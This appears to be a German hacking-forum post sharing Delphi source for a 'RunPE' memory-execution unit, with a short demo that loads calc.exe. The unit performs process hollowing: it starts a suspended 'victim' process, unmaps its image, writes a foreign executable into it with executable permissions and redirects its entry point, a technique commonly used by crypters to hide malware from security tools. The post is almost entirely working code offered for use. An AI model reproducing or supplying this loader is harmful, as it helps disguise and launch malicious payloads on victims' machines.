Themabewertung:
  • 0 Bewertung(en) - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
  [Delphi] Memory Execution RunPe
#1
Using:

Code:
program RunPE;

uses
 Windows,
 uRunPE in 'uRunPE.pas';

var
 bBuff:  TByteArray;

{$R *.res}

function FileToBytes(sPath:string; var bFile:TByteArray):Boolean;
var
 hFile:  THandle;
 dSize:  DWORD;
 dRead:  DWORD;
begin
 Result := FALSE;
 hFile := CreateFile(PChar(sPath), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
 if hFile <> INVALID_HANDLE_VALUE then
 begin
   dSize := GetFileSize(hFile, nil);
   SetLength(bFile, dSize);
   ReadFile(hFile, bFile[0], dSize, dRead, nil);
   CloseHandle(hFile);

   if dRead = dSize then
     Result := TRUE;
 end;
end;

begin
 if FileToBytes('calc.exe', bBuff) then
   RunExe(ParamStr(0), bBuff);
end.


Code:

Code:
UNIT
unit uRunPE;

interface

uses Windows;

type
 TByteArray = array of Byte;

function RunEXE(sVictim:string; bFile:TByteArray):Boolean;
function NtUnmapViewOfSection(ProcessHandle: THandle; BaseAddress: Pointer): DWORD; stdcall; external 'ntdll.dll';

implementation

procedure Move(Destination, Source: Pointer; dLength:Cardinal);
begin
 CopyMemory(Destination, Source, dLength);
end;

function RunEXE(sVictim:string; bFile:TByteArray):Boolean;
var
 IDH:        TImageDosHeader;
 INH:        TImageNtHeaders;
 ISH:        TImageSectionHeader;
 PI:         TProcessInformation;
 SI:         TStartUpInfo;
 CONT:       TContext;
 ImageBase:  Pointer;
 Ret:        DWORD;
 i:          integer;
 Addr:       DWORD;
 dOffset:    DWORD;
begin
 Result := FALSE;
 try
   Move(@IDH, @bFile[0], 64);
   if IDH.e_magic = IMAGE_DOS_SIGNATURE then
   begin
     Move(@INH, @bFile[IDH._lfanew], 248);
     if INH.Signature = IMAGE_NT_SIGNATURE then
     begin
       FillChar(SI, SizeOf(TStartupInfo),#0);
       FillChar(PI, SizeOf(TProcessInformation),#0);
       SI.cb := SizeOf(TStartupInfo);
       if CreateProcess(nil, PChar(sVictim), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, SI, PI) then
       begin
         CONT.ContextFlags := CONTEXT_FULL;
         if GetThreadContext(PI.hThread, CONT) then
         begin
           ReadProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @Addr, 4, Ret);
           NtUnmapViewOfSection(PI.hProcess, @Addr);
           ImageBase := VirtualAllocEx(PI.hProcess, Ptr(INH.OptionalHeader.ImageBase), INH.OptionalHeader.SizeOfImage, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE);
           WriteProcessMemory(PI.hProcess, ImageBase, @bFile[0], INH.OptionalHeader.SizeOfHeaders, Ret);
           dOffset := IDH._lfanew + 248;
           for i := 0 to INH.FileHeader.NumberOfSections - 1 do
           begin
             Move(@ISH, @bFile[dOffset + (i * 40)], 40);
             WriteProcessMemory(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), @bFile[ISH.PointerToRawData], ISH.SizeOfRawData, Ret);
             VirtualProtectEx(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), ISH.Misc.VirtualSize, PAGE_EXECUTE_READWRITE, @Addr);
           end;
           WriteProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @ImageBase, 4, Ret);
           CONT.Eax := Cardinal(ImageBase) + INH.OptionalHeader.AddressOfEntryPoint;
           SetThreadContext(PI.hThread, CONT);
           ResumeThread(PI.hThread);
           Result := TRUE;
         end;
       end;
     end;
   end;
 except
   CloseHandle(PI.hProcess);
   CloseHandle(PI.hThread);
 end;
end;

end.
Zitieren


Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste
www.D3n1s.Net